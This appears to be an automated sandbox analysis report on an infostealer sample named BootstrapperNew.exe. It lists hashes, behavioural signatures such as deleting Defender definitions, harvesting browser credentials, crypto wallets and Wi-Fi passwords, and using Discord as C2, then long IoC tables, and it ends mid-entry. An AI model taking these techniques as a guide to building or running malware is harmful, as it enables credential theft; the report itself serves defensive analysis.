Analysis
-
max time kernel
1361s -
max time network
1422s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250218-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250218-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
21-02-2025 21:35
Behavioral task
behavioral1
Sample
BootstrapperNew.exe
Resource
win10ltsc2021-20250218-en
General
-
Target
BootstrapperNew.exe
-
Size
10.1MB
-
MD5
27bf3ccae92dd7f3b19ba303aa722ca1
-
SHA1
ebe200dc738973912d926e6db16249f4bba0294b
-
SHA256
6f17015a192e486069bd889dace721c54f09dbc190d796d7e18bb47996451b48
-
SHA512
080025858ee279c3f3f8391c6d3f1832f3f8decc4fa60fa493aff058853784e3784d784cc1f45d26254e2c55accf5fb39178dcb8251a7ba4cc009665967ea35d
-
SSDEEP
196608:HWD06HiZYMYYBKpYDXcbwO/ikbwfI9jUCD6rlaZLH7qRGrGIYUoZy8FUsOnAoF:DZEHOXcb1inIH20drLYRZjoF
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 656 MpCmdRun.exe -
pid Process 2896 powershell.exe 4768 powershell.exe 3052 powershell.exe 2452 powershell.exe 2400 powershell.exe 3156 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts BootstrapperNew.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 5012 cmd.exe 3544 powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 2336 bound.exe 668 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 1032 BootstrapperNew.exe 1032 BootstrapperNew.exe 1032 BootstrapperNew.exe 1032 BootstrapperNew.exe 1032 BootstrapperNew.exe 1032 BootstrapperNew.exe 1032 BootstrapperNew.exe 1032 BootstrapperNew.exe 1032 BootstrapperNew.exe 1032 BootstrapperNew.exe 1032 BootstrapperNew.exe 1032 BootstrapperNew.exe 1032 BootstrapperNew.exe 1032 BootstrapperNew.exe 1032 BootstrapperNew.exe 1032 BootstrapperNew.exe 1032 BootstrapperNew.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 6 discord.com 7 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 3792 tasklist.exe 2792 tasklist.exe 2344 tasklist.exe 1588 tasklist.exe -
resource yara_rule behavioral1/files/0x000a000000027e03-22.dat upx behavioral1/memory/1032-26-0x00007FFC8C8A0000-0x00007FFC8CF04000-memory.dmp upx behavioral1/files/0x000a000000027df5-28.dat upx behavioral1/memory/1032-31-0x00007FFCA09E0000-0x00007FFCA0A07000-memory.dmp upx behavioral1/files/0x000a000000027e01-30.dat upx behavioral1/memory/1032-50-0x00007FFCA5190000-0x00007FFCA519F000-memory.dmp upx behavioral1/files/0x000a000000027dfc-49.dat upx behavioral1/files/0x000a000000027dfb-48.dat upx behavioral1/files/0x000a000000027dfa-47.dat upx behavioral1/files/0x000a000000027df9-46.dat upx behavioral1/files/0x000a000000027df8-45.dat upx behavioral1/files/0x0058000000027df7-44.dat upx behavioral1/files/0x0031000000027df6-43.dat upx behavioral1/files/0x000b000000027df4-42.dat upx behavioral1/files/0x000a000000027e08-41.dat upx behavioral1/files/0x000a000000027e07-40.dat upx behavioral1/files/0x000a000000027e06-39.dat upx behavioral1/files/0x000a000000027e02-36.dat upx behavioral1/files/0x000a000000027e00-35.dat upx behavioral1/memory/1032-54-0x00007FFCA09B0000-0x00007FFCA09DB000-memory.dmp upx behavioral1/memory/1032-53-0x00007FFCA3150000-0x00007FFCA3169000-memory.dmp upx behavioral1/memory/1032-60-0x00007FFCA0980000-0x00007FFCA09A5000-memory.dmp upx behavioral1/memory/1032-62-0x00007FFC9AF10000-0x00007FFC9B08F000-memory.dmp upx behavioral1/memory/1032-64-0x00007FFCA2FF0000-0x00007FFCA3009000-memory.dmp upx behavioral1/memory/1032-66-0x00007FFCA06C0000-0x00007FFCA06CD000-memory.dmp upx behavioral1/memory/1032-73-0x00007FFC9BD80000-0x00007FFC9BE4E000-memory.dmp upx behavioral1/memory/1032-76-0x00007FFC8C360000-0x00007FFC8C893000-memory.dmp upx behavioral1/memory/1032-75-0x00007FFCA09E0000-0x00007FFCA0A07000-memory.dmp upx behavioral1/memory/1032-70-0x00007FFC9C9D0000-0x00007FFC9CA03000-memory.dmp upx behavioral1/memory/1032-69-0x00007FFC8C8A0000-0x00007FFC8CF04000-memory.dmp upx behavioral1/memory/1032-78-0x00007FFC9C9B0000-0x00007FFC9C9C4000-memory.dmp upx behavioral1/memory/1032-81-0x00007FFC9C9A0000-0x00007FFC9C9AD000-memory.dmp upx behavioral1/memory/1032-80-0x00007FFCA09B0000-0x00007FFCA09DB000-memory.dmp upx behavioral1/memory/1032-88-0x00007FFC9B9E0000-0x00007FFC9BA93000-memory.dmp upx behavioral1/memory/1032-87-0x00007FFCA0980000-0x00007FFCA09A5000-memory.dmp upx behavioral1/memory/1032-121-0x00007FFC9AF10000-0x00007FFC9B08F000-memory.dmp upx behavioral1/memory/1032-194-0x00007FFCA2FF0000-0x00007FFCA3009000-memory.dmp upx behavioral1/memory/1032-232-0x00007FFC9BD80000-0x00007FFC9BE4E000-memory.dmp upx behavioral1/memory/1032-231-0x00007FFC9C9D0000-0x00007FFC9CA03000-memory.dmp upx behavioral1/memory/1032-272-0x00007FFC8C360000-0x00007FFC8C893000-memory.dmp upx behavioral1/memory/1032-323-0x00007FFC9C9A0000-0x00007FFC9C9AD000-memory.dmp upx behavioral1/memory/1032-310-0x00007FFC8C8A0000-0x00007FFC8CF04000-memory.dmp upx behavioral1/memory/1032-316-0x00007FFC9AF10000-0x00007FFC9B08F000-memory.dmp upx behavioral1/memory/1032-366-0x00007FFC8C8A0000-0x00007FFC8CF04000-memory.dmp upx behavioral1/memory/1032-381-0x00007FFCA09B0000-0x00007FFCA09DB000-memory.dmp upx behavioral1/memory/1032-386-0x00007FFCA0980000-0x00007FFCA09A5000-memory.dmp upx behavioral1/memory/1032-390-0x00007FFC9C9D0000-0x00007FFC9CA03000-memory.dmp upx behavioral1/memory/1032-389-0x00007FFCA06C0000-0x00007FFCA06CD000-memory.dmp upx behavioral1/memory/1032-388-0x00007FFCA2FF0000-0x00007FFCA3009000-memory.dmp upx behavioral1/memory/1032-387-0x00007FFC9AF10000-0x00007FFC9B08F000-memory.dmp upx behavioral1/memory/1032-385-0x00007FFC8C360000-0x00007FFC8C893000-memory.dmp upx behavioral1/memory/1032-384-0x00007FFCA3150000-0x00007FFCA3169000-memory.dmp upx behavioral1/memory/1032-383-0x00007FFCA5190000-0x00007FFCA519F000-memory.dmp upx behavioral1/memory/1032-382-0x00007FFCA09E0000-0x00007FFCA0A07000-memory.dmp upx behavioral1/memory/1032-380-0x00007FFC9B9E0000-0x00007FFC9BA93000-memory.dmp upx behavioral1/memory/1032-379-0x00007FFC9C9A0000-0x00007FFC9C9AD000-memory.dmp upx behavioral1/memory/1032-378-0x00007FFC9C9B0000-0x00007FFC9C9C4000-memory.dmp upx behavioral1/memory/1032-376-0x00007FFC9BD80000-0x00007FFC9BE4E000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 2788 cmd.exe 4432 netsh.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1248 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 2340 systeminfo.exe -
Modifies registry class 56 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0000000001000000ffffffff firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" firefox.exe Key created \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 firefox.exe Key created \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell firefox.exe Key created \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000 firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff firefox.exe Key created \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell firefox.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" firefox.exe Key created \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 firefox.exe Key created \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2" firefox.exe Key created \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" firefox.exe Key created \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU firefox.exe Key created \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3 firefox.exe Key created \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Downloads" firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" firefox.exe Key created \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff firefox.exe Key created \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags firefox.exe Key created \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "3" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" firefox.exe Key created \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 firefox.exe Set value (str) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 14002e8005398e082303024b98265d99428e115f0000 firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616193" firefox.exe Set value (int) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" firefox.exe Set value (data) \REGISTRY\USER\S-1-5-21-556327730-4249790997-552795783-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 firefox.exe -
Suspicious behavior: EnumeratesProcesses 45 IoCs
pid Process 2452 powershell.exe 2896 powershell.exe 2400 powershell.exe 2400 powershell.exe 2896 powershell.exe 2896 powershell.exe 3156 powershell.exe 3156 powershell.exe 2452 powershell.exe 2452 powershell.exe 3156 powershell.exe 1860 WMIC.exe 1860 WMIC.exe 1860 WMIC.exe 1860 WMIC.exe 3544 powershell.exe 3544 powershell.exe 2900 powershell.exe 2900 powershell.exe 2900 powershell.exe 3544 powershell.exe 4768 powershell.exe 4768 powershell.exe 1860 powershell.exe 1860 powershell.exe 4976 WMIC.exe 4976 WMIC.exe 4976 WMIC.exe 4976 WMIC.exe 4080 WMIC.exe 4080 WMIC.exe 4080 WMIC.exe 4080 WMIC.exe 3348 WMIC.exe 3348 WMIC.exe 3348 WMIC.exe 3348 WMIC.exe 3052 powershell.exe 3052 powershell.exe 1248 WMIC.exe 1248 WMIC.exe 1248 WMIC.exe 1248 WMIC.exe 1016 powershell.exe 1016 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4084 firefox.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2452 powershell.exe Token: SeDebugPrivilege 2896 powershell.exe Token: SeDebugPrivilege 2400 powershell.exe Token: SeDebugPrivilege 2792 tasklist.exe Token: SeDebugPrivilege 3792 tasklist.exe Token: SeDebugPrivilege 3156 powershell.exe Token: SeIncreaseQuotaPrivilege 1860 WMIC.exe Token: SeSecurityPrivilege 1860 WMIC.exe Token: SeTakeOwnershipPrivilege 1860 WMIC.exe Token: SeLoadDriverPrivilege 1860 WMIC.exe Token: SeSystemProfilePrivilege 1860 WMIC.exe Token: SeSystemtimePrivilege 1860 WMIC.exe Token: SeProfSingleProcessPrivilege 1860 WMIC.exe Token: SeIncBasePriorityPrivilege 1860 WMIC.exe Token: SeCreatePagefilePrivilege 1860 WMIC.exe Token: SeBackupPrivilege 1860 WMIC.exe Token: SeRestorePrivilege 1860 WMIC.exe Token: SeShutdownPrivilege 1860 WMIC.exe Token: SeDebugPrivilege 1860 WMIC.exe Token: SeSystemEnvironmentPrivilege 1860 WMIC.exe Token: SeRemoteShutdownPrivilege 1860 WMIC.exe Token: SeUndockPrivilege 1860 WMIC.exe Token: SeManageVolumePrivilege 1860 WMIC.exe Token: 33 1860 WMIC.exe Token: 34 1860 WMIC.exe Token: 35 1860 WMIC.exe Token: 36 1860 WMIC.exe Token: SeDebugPrivilege 2344 tasklist.exe Token: SeDebugPrivilege 3544 powershell.exe Token: SeIncreaseQuotaPrivilege 2896 powershell.exe Token: SeSecurityPrivilege 2896 powershell.exe Token: SeTakeOwnershipPrivilege 2896 powershell.exe Token: SeLoadDriverPrivilege 2896 powershell.exe Token: SeSystemProfilePrivilege 2896 powershell.exe Token: SeSystemtimePrivilege 2896 powershell.exe Token: SeProfSingleProcessPrivilege 2896 powershell.exe Token: SeIncBasePriorityPrivilege 2896 powershell.exe Token: SeCreatePagefilePrivilege 2896 powershell.exe Token: SeBackupPrivilege 2896 powershell.exe Token: SeRestorePrivilege 2896 powershell.exe Token: SeShutdownPrivilege 2896 powershell.exe Token: SeDebugPrivilege 2896 powershell.exe Token: SeSystemEnvironmentPrivilege 2896 powershell.exe Token: SeRemoteShutdownPrivilege 2896 powershell.exe Token: SeUndockPrivilege 2896 powershell.exe Token: SeManageVolumePrivilege 2896 powershell.exe Token: 33 2896 powershell.exe Token: 34 2896 powershell.exe Token: 35 2896 powershell.exe Token: 36 2896 powershell.exe Token: SeIncreaseQuotaPrivilege 2400 powershell.exe Token: SeSecurityPrivilege 2400 powershell.exe Token: SeTakeOwnershipPrivilege 2400 powershell.exe Token: SeLoadDriverPrivilege 2400 powershell.exe Token: SeSystemProfilePrivilege 2400 powershell.exe Token: SeSystemtimePrivilege 2400 powershell.exe Token: SeProfSingleProcessPrivilege 2400 powershell.exe Token: SeIncBasePriorityPrivilege 2400 powershell.exe Token: SeCreatePagefilePrivilege 2400 powershell.exe Token: SeBackupPrivilege 2400 powershell.exe Token: SeRestorePrivilege 2400 powershell.exe Token: SeShutdownPrivilege 2400 powershell.exe Token: SeDebugPrivilege 2400 powershell.exe Token: SeSystemEnvironmentPrivilege 2400 powershell.exe -
Suspicious use of FindShellTrayWindow 21 IoCs
pid Process 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe -
Suspicious use of SendNotifyMessage 20 IoCs
pid Process 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe 4084 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3616 wrote to memory of 1032 3616 BootstrapperNew.exe 81 PID 3616 wrote to memory of 1032 3616 BootstrapperNew.exe 81 PID 1032 wrote to memory of 4908 1032 BootstrapperNew.exe 82 PID 1032 wrote to memory of 4908 1032 BootstrapperNew.exe 82 PID 1032 wrote to memory of 4480 1032 BootstrapperNew.exe 83 PID 1032 wrote to memory of 4480 1032 BootstrapperNew.exe 83 PID 1032 wrote to memory of 5020 1032 BootstrapperNew.exe 86 PID 1032 wrote to memory of 5020 1032 BootstrapperNew.exe 86 PID 1032 wrote to memory of 4656 1032 BootstrapperNew.exe 87 PID 1032 wrote to memory of 4656 1032 BootstrapperNew.exe 87 PID 1032 wrote to memory of 1052 1032 BootstrapperNew.exe 88 PID 1032 wrote to memory of 1052 1032 BootstrapperNew.exe 88 PID 4480 wrote to memory of 2896 4480 cmd.exe 92 PID 4480 wrote to memory of 2896 4480 cmd.exe 92 PID 4908 wrote to memory of 2452 4908 cmd.exe 93 PID 4908 wrote to memory of 2452 4908 cmd.exe 93 PID 1032 wrote to memory of 2300 1032 BootstrapperNew.exe 94 PID 1032 wrote to memory of 2300 1032 BootstrapperNew.exe 94 PID 1032 wrote to memory of 2836 1032 BootstrapperNew.exe 95 PID 1032 wrote to memory of 2836 1032 BootstrapperNew.exe 95 PID 5020 wrote to memory of 2400 5020 cmd.exe 96 PID 5020 wrote to memory of 2400 5020 cmd.exe 96 PID 4656 wrote to memory of 2336 4656 cmd.exe 99 PID 4656 wrote to memory of 2336 4656 cmd.exe 99 PID 1052 wrote to memory of 3156 1052 cmd.exe 100 PID 1052 wrote to memory of 3156 1052 cmd.exe 100 PID 2300 wrote to memory of 3792 2300 cmd.exe 101 PID 2300 wrote to memory of 3792 2300 cmd.exe 101 PID 1032 wrote to memory of 2740 1032 BootstrapperNew.exe 102 PID 1032 wrote to memory of 2740 1032 BootstrapperNew.exe 102 PID 1032 wrote to memory of 5012 1032 BootstrapperNew.exe 104 PID 1032 wrote to memory of 5012 1032 BootstrapperNew.exe 104 PID 1032 wrote to memory of 1096 1032 